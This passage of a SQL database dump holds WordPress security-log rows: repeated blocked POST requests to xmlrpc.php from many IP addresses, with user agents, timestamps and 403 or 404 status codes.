Safari\\/537.36\"}','gBJdfpSW0QrNTmzIjHvZ56Du',0,1681113417.0228,1600,'','POST',403,0,515,0,1,'',0),('134.19.179.131',2249438083,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3d6YUM5pWz8iBOIPjltKyCca',0,1681114541.5073,1523,'','POST',403,0,515,0,1,'',0),('184.75.221.3',3091979523,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2f6lhVHatAvECIWpbxy0r43L',0,1681115861.5012,3931,'','POST',403,0,515,0,1,'',0),('213.152.162.170',3583550122,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Lt75ajkvd3oA1hNxsRyJB94K',0,1681116593.5363,4071,'','POST',403,0,515,0,1,'',0),('213.152.161.138',3583549834,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EMZntcqoRGPewTOA6018BHmY',0,1681117263.2163,3495,'','POST',403,0,515,0,1,'',0),('146.70.61.147',2454076819,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rLnIgdFiO1XE3UHKQes9ZDM5',0,1681117654.0042,3937,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','2ClRLzuGjqxihHUT1F0fpdMt',0,1681117763.2709,797,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','5HSNW3YyTMkDgBGjufVnbR27',0,1681117763.9602,688,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ygGpnTzXq7xof1aA5bmJKBkR',0,1681117766.5468,564,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','SI5GMj7x28QqbmsXApPoYzKu',0,1681117772.7291,619,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','eTYosliAwq3aMV8cCjydv7Qr',0,1681117776.0624,687,'','POST',403,0,515,0,1,'',0),('107.190.139.114',1807649650,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','E0KmHMB63lvwjbN5yGx1oe7J',0,1681117778.0611,599,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','qi5Nk6ZWJt9zasCE7odLxucH',0,1681117781.1130,673,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','JnI0X7ivVxpAy5fFmqchozEN',0,1681117789.3178,2823,'','POST',403,0,515,0,1,'',0),('46.182.84.66',783701058,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','E65GAvgbyD0cnCxhZjwSdWlB',0,1681117803.9315,1815,'','POST',403,0,515,0,1,'',0),('107.167.244.51',1806169139,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vQjKPSJ8oC24LaDWsiAkVIeY',0,1681118008.0271,879,'','POST',403,0,515,0,1,'',0),('213.152.161.118',3583549814,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','V5ueCQPAgJ0IoBqv19UFSTsM',0,1681118614.3869,4369,'','POST',403,0,515,0,1,'',0),('213.152.162.149',3583550101,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','81kgqTC3zGfJwPtKH7QcBrmu',0,1681120088.7563,3026,'','POST',403,0,515,0,1,'',0),('134.19.179.195',2249438147,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QOTenZI1FhiK5uUtsXk0VbSB',0,1681120898.6304,4395,'','POST',403,0,515,0,1,'',0),('64.42.179.35',1076540195,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qK0TOPCji8XU1RW9SAFZ4dvJ',0,1681121018.8231,621,'','POST',403,0,515,0,1,'',0),('64.42.179.35',1076540195,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OFbjx0kLaXBoUfq69e1sVAQ8',0,1681121396.6709,1585,'','POST',403,0,515,0,1,'',0),('213.152.161.40',3583549736,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','09GOLr8jbWcV74BlHIiUk3nE',0,1681122636.5551,4587,'','POST',403,0,515,0,1,'',0),('213.152.187.225',3583556577,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','byq1IsM56HFunYiC2SwK7fca',0,1681122778.8138,588,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','b5YqAoCj49ymGg6LIHrSpfUd',0,1681122851.1156,574,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','s3AxKvdFhNtJCou78lPkIeYV',0,1681122859.3468,595,'','POST',403,0,515,0,1,'',0),('114.215.93.65',1926716737,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Lf3j4xzkSUHnlvqEuiFJW8bK',0,1681122904.1154,1650,'','POST',403,0,515,0,1,'',0),('62.171.133.145',1051428241,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','ReT31gS5BOjqL7MzxICJZhpl',0,1681122914.5321,720,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','2dxUtSPMQqbLCGc53VNjrE1F',0,1681122916.6633,675,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','W6sHdvCp1z9PtE32hLxDK574',0,1681122924.6277,822,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','OIfhNwtzQxj4mAd0eDZFpMWR',0,1681122926.7432,1300,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','jYvUcCJdRTgGKDMfF7y8swtb',0,1681122933.0785,1309,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','PJ7mw2fkQoEB43HWXpZ50Uzt',0,1681122933.2636,1324,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','JcUN76pQFPRCGLa5bWqhkr91',0,1681122943.7895,455,'','POST',404,0,515,0,1,'',0),('5.9.220.53',84532277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','THtXhMuZeoFQaxLPzi1wEmRJ',0,1681122947.9359,635,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','m4DfZvcYgAQTBt0d9GUweIb3',0,1681122950.7180,604,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','PQ7Igdepw5UifEHJWAnMSltk',0,1681122952.8176,409,'','POST',404,0,515,0,1,'',0),('210.116.66.47',3530834479,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','IOj9xkqNGhVm2yWS7uJfBgH1',0,1681122957.3136,703,'','POST',403,0,515,0,1,'',0),('134.19.179.203',2249438155,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8xKPLSprfVMGE23y7gzjRnh1',0,1681123519.7423,1432,'','POST',403,0,515,0,1,'',0),('134.19.179.203',2249438155,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','UerlkEbNHuChgwpVJa3sGjvX',0,1681123757.4605,592,'','POST',403,0,515,0,1,'',0),('107.167.244.51',1806169139,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','skGohtbHl9jUd2uIvpfgenrx',0,1681123949.7619,2587,'','POST',403,0,515,0,1,'',0),('185.185.89.10',3115931914,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','dTilS0QUwDNYJCjZvxqbatRW',0,1681123950.8612,1496,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','FeUInfSau0iMpgDTxWBdVYJz',0,1681123958.9948,573,'','POST',403,0,515,0,1,'',0),('79.170.43.200',1336552392,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ujgatoyPBcDM1ehLrX3xCl2f',0,1681123964.4313,569,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','emOvc86jpoFh5yPNXwk421gq',0,1681123973.9203,660,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','BKVQvUSAyZr5pHsbI9gOxfY4',0,1681123982.3369,636,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','pbYfN76TyDPQd4CjxBXZ3Hmn',0,1681123986.3799,736,'','POST',403,0,515,0,1,'',0),('199.249.230.47',3355043375,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','iSNMkp9bQ1eEhY3fJm6TdruK',0,1681124981.6195,1040,'','POST',403,0,515,0,1,'',0),('162.14.102.253',2718852861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','yUdWpgPwcAt6E94Sh7J85KLu',0,1681128025.2998,1431,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','VF9mlBXsDwH3PrhdejAyG6NW',0,1681128027.0891,692,'','POST',403,0,515,0,1,'',0),('156.224.21.75',2631931211,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','yVb8qcPsGES9TF4uBWKpUIQO',0,1681128028.1180,679,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','ZeY3kigL2vEyGxJmwU5aFfHh',0,1681128037.1821,609,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','jo5Q0gERtaFwOfndSA4GbWC3',0,1681128040.8718,608,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','TcBMNObYAtjflkH3yGxUJWIK',0,1681128043.1658,625,'','POST',403,0,515,0,1,'',0),('198.38.86.87',3324401239,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','pSAkhl6Nxo4fmtH70auP8v9J',0,1681128049.0986,664,'','POST',403,0,515,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','fmLuI93i65kgh2YUsybOreNP',0,1681128050.3797,1405,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','sDuINgV1AUWoB4a2OtxwRHzL',0,1681128050.6886,1377,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','0wSsvtAGY3aMd2W98ZFChrcx',0,1681128058.5259,631,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','G8zdykNChZLuEK4eMg27TaFv',0,1681128066.2155,637,'','POST',403,0,515,0,1,'',0),('68.178.201.128',1152567680,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','LkRxJ2UslSmy3GPfu4hrADHn',0,1681128072.3040,565,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','CfuahzMVU4j2Fi6btRA18Erw',0,1681128896.2543,1637,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','1GS2zZ7reisobJBdWvw46f0V',0,1681128898.5978,609,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','s4YbDlLEk7hCI8Jp9GU5y0KB',0,1681128904.1923,1411,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','FDbg0437n9CaQruHi8s5Pmy2',0,1681128905.5080,833,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','qYS1U3PugnTvjizhxsFReaXH',0,1681128908.9005,618,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','6pO3GKRy5VinT9HA1zhU4Z2S',0,1681128911.9282,599,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','P2uhXiYIjAFD91yOUBps8M4d',0,1681128913.4845,587,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','crugUpwaPSRfZ2sCABHy4v3O',0,1681128925.6556,569,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','cKBr7OiptfUNFzmvR28yE6Sh',0,1681128927.2009,611,'','POST',403,0,515,0,1,'',0),('104.254.90.195',1761499843,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eQ2PNsgZ9FBr0DGxilbq7yY8',0,1681129447.2646,810,'','POST',403,0,515,0,1,'',0),('213.152.187.225',3583556577,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6MySGuBFe1TsbL2r9vgRxcol',0,1681129876.8329,3695,'','POST',403,0,515,0,1,'',0),('64.42.179.67',1076540227,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6bzA5kYh4o1qnLBVW2IQNUCc',0,1681130630.0603,3658,'','POST',403,0,515,0,1,'',0),('199.249.230.47',3355043375,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PIFNyDkvLgH8in7uqh1VOoK0',0,1681132775.1081,672,'','POST',403,0,515,0,1,'',0),('213.152.187.215',3583556567,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DbYwI07OjcLB2Nx8FoqzftUV',0,1681133358.9894,1553,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','YqrH2NXpEenISiZColadDbA8',0,1681133973.8923,749,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','vJdBuzL63lPaGqKI8cVbtohk',0,1681133978.7034,578,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','d309gP6fi2CENxetwzMvDHQV',0,1681133984.3351,590,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','8NrQdaOvZRjpfLK9oMU2w7Fh',0,1681133992.7362,2087,'','POST',403,0,515,0,1,'',0),('103.142.25.164',1737365924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','egcF0d84z5kXvoUS6Nf3Hs9n',0,1681133997.7493,618,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','bonCDVydwOlGEiUuM3jRp0qW',0,1681134002.9097,1013,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JEOSNjomnk7IhwyzDuGVxsvB',0,1681134023.0749,878,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','nqZs2ok3jWG8EzcVCSpTBY6m',0,1681134029.8968,657,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 